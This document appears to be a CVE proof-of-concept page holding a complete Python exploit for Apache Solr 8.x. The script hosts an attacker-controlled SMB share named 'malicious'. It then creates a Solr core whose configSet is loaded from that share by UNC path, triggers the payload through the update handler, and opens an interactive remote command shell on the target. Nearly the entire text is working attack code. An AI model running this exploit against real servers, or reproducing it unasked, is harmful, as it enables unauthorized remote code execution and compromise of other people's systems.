4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
import requests
import time
import sys
import argparse
import random
import string
import threading
import socket
from pathlib import Path
from impacket import smbserver

def generate_random_chars(length=8):
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))

def get_local_ip():
    try:
        # Connect to a dummy address to determine local IP
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
    except Exception:
        return "127.0.0.1"

def start_smb_server(share_name="malicious", port=445):
    def run_server():
        try:
            files_path = str(Path("files").absolute())
            
            # Create SMB server instance
            server = smbserver.SimpleSMBServer(listenAddress="0.0.0.0", listenPort=port)
            server.addShare(share_name.upper(), files_path)
            server.setSMB2Support(True)
            server.start()

        except Exception as e:
            print(f"[!] Error starting SMB server: {e}")
    
    # Start server in background thread
    server_thread = threading.Thread(target=run_server, daemon=True)
    server_thread.start()
    time.sleep(2)
    
    return server_thread

def create_solr_core(host, port, smb_host, share_name):
    """
    Create Solr core that pulls malicious config from SMB server.
    """
    base_url = f"http://{host}:{port}"
    endpoint = "/solr/admin/cores"
    
    # Generate random core name
    core_name = f"exploit_core_{generate_random_chars()}"
    # UNC path to our malicious SMB share
    malicious_configset = f"//{smb_host}/{share_name}"
    
    params = {
        '_': int(time.time() * 1000),
        'action': 'CREATE',
        'configSet': malicious_configset,
        'name': core_name,
        'wt': 'json'
    }
    
    headers = {
        'X-Requested-With': 'XMLHttpRequest',
        'Accept-Language': 'en-US,en;q=0.9',
        'Accept': 'application/json, text/plain, */*',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36',
        'Accept-Encoding': 'gzip, deflate, br',
        'Connection': 'keep-alive'
    }
    
    try:
        print(f"[*] Sending core creation request to: {base_url}{endpoint}")
        
        response = requests.get(
            f"{base_url}{endpoint}",
            params=params,
            headers=headers,
            timeout=30
        )
        
        print(f"[*] Response Status Code: {response.status_code}")
        
        # Parse JSON response if possible
        try:
            json_response = response.json()
            if 'error' in json_response:
                print(f"[!] Error creating core: {json_response['error']}")
                return False, None
            else:
                print(f"[*] Core '{core_name}' created successfully!")
                return True, core_name
                
        except ValueError:
            print(f"[!] Non-JSON response: {response.text}")
            return False, None
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return False, None

def trigger_payload(host, port, core_name):
    """
    Trigger the malicious payload by sending a request to the update handler.
    """
    print(f"[*] Triggering payload execution")
    
    base_url = f"http://{host}:{port}"
    endpoint = f"/solr/{core_name}/update"
    
    # Simple document to trigger the update processor
    payload_data = '''<?xml version="1.0" encoding="UTF-8"?>
<add>
    <doc>
        <field name="id">exploit_trigger</field>
        <field name="title">Exploit Trigger</field>
    </doc>
</add>'''
    
    headers = {
        'Content-Type': 'application/xml',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36'
    }
    
    try:
        print(f"[*] Sending payload to: {base_url}{endpoint}")
        
        response = requests.post(
            f"{base_url}{endpoint}",
            data=payload_data,
            headers=headers,
            params={ 'wt': 'json', 'cmd': 'whoami' },
            timeout=30
        )
        
        if response.status_code == 200:
            print(f"[*] Payload executed successfully!")
            # Start interactive shell after successful test
            interactive_shell(host, port, core_name)
            return True
        else:
            print(f"[!] Payload execution may have failed")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return False

def execute_command(host, port, core_name, command):
    base_url = f"http://{host}:{port}"
    endpoint = f"/solr/{core_name}/update"
    payload_data = '{"add": {"doc": {"id": "interactive", "title": "Interactive"}}}'
    headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0' }
    try:
        resp = requests.post(
            f"{base_url}{endpoint}",
            data=payload_data,
            headers=headers,
            params={ 'wt': 'json', 'cmd': command },
            timeout=30
        )
        if resp.status_code != 200:
            return False, f"HTTP {resp.status_code}", None
        try:
            data = resp.json()
            stdout = data.get('stdout', '')
            stderr = data.get('stderr', '')
            exit_code = data.get('exit_code', 0)
            status = data.get('status', '')
            return True, { 'stdout': stdout, 'stderr': stderr, 'exit_code': exit_code, 'status': status }, data
        except Exception:
            return False, "JSON parse failed", None
    except Exception as e:
        return False, str(e), None

def interactive_shell(host, port, core_name):
    while True:
        try:
            cmd = input("\nsolr> ").strip()
            if not cmd:
                continue
            if cmd.lower() in ('exit','quit'):
                print("[*] exiting shell...")
                break
            ok, result, raw = execute_command(host, port, core_name, cmd)
            if ok:
                print(f"[+] exit_code: {result['exit_code']}, status: {result['status']}")
                if result['stdout']:
                    print("--- stdout ---")
                    print(result['stdout'].rstrip())
                if result['stderr']:
                    print("--- stderr ---")
                    print(result['stderr'].rstrip())
            else:
                print(f"[!] command failed: {result}")
        except KeyboardInterrupt:
            print("\n[*] interrupted")
            break

def parse_args():
    parser = argparse.ArgumentParser(
        description="Solr 8.x Exploit Chain - configSet core creation via SMB",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  %(prog)s 192.168.35.31
  %(prog)s 10.0.0.1 --port 8983
  %(prog)s 192.168.1.100 --smb-port 445 --smb-host 192.168.1.50
        """
    )
    parser.add_argument('target_host', help='Target Solr server IP address')
    parser.add_argument('--port', '-p', type=int, default=8983, help='Solr server port (default: 8983)')
    parser.add_argument('--smb-host', help='SMB server IP (default: auto-detect local IP)')
    parser.add_argument('--smb-port', type=int, default=445, help='SMB server port (default: 445)')
    parser.add_argument('--share-name', default='malicious', help='SMB share name (default: malicious)')
    
    return parser.parse_args()

def main():
    args = parse_args()
    
    print(f"[*] Target: {args.target_host}:{args.port}")
    smb_host = args.smb_host or get_local_ip()
    print(f"[*] SMB Server: {smb_host}:{args.smb_port}")
    print(f"[*] Share Name: {args.share_name}")
    
    try:
        # Start SMB server
        print(f"\n[*] Starting SMB Server on {smb_host}:{args.smb_port}")
        server_thread = start_smb_server(args.share_name, args.smb_port)
        print("[*] Waiting for SMB server to start...")
        time.sleep(3)
        
        # Create malicious Solr core
        print(f"\n[*] Creating Solr Core")
        success, core_name = create_solr_core(args.target_host, args.port, smb_host, args.share_name)
        
        if not success:
            print("[!] Failed to create Solr core!")
            return False
        
        # Trigger payload execution
        print(f"\n[*] Triggering Payload")
        trigger_payload(args.target_host, args.port, core_name)
        
        # Keep SMB server running for a bit
        time.sleep(30)
        
        return True
        
    except Exception as e:
        print(f"\n[!] Exploit failed: {e}")
        return False

if __name__ == "__main__":
    main()